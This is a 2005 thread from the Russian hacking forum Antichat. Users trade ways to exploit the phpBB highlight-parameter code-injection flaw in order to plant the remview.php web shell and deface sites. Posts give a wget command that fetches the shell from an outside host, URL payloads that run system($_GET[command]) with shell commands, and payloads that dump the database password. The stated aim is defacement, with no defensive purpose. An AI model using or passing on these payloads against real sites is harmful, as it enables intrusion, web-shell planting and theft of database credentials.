ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 14.02.2005, 22:34
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен
 
Ответить с цитированием

  #32  
Старый 14.02.2005, 23:36
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..
 
Ответить с цитированием

  #33  
Старый 15.02.2005, 00:56
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?
 
Ответить с цитированием

  #34  
Старый 15.02.2005, 03:53
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\
 
Ответить с цитированием

  #35  
Старый 15.02.2005, 15:06
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #36  
Старый 15.02.2005, 15:13
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!
 
Ответить с цитированием

  #37  
Старый 15.02.2005, 15:15
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpass wd.%2527
 
Ответить с цитированием

  #38  
Старый 15.02.2005, 15:42
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию

Ок! Спасибо братуха Разобрался!
 
Ответить с цитированием

  #39  
Старый 15.02.2005, 16:25
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Пожалуста... надо в новостях это подправить ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие есть уязвимости в Powered by phpBB: 2.0.0 © 2001 phpBB Group? forever777 Форумы 4 14.12.2005 13:19
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ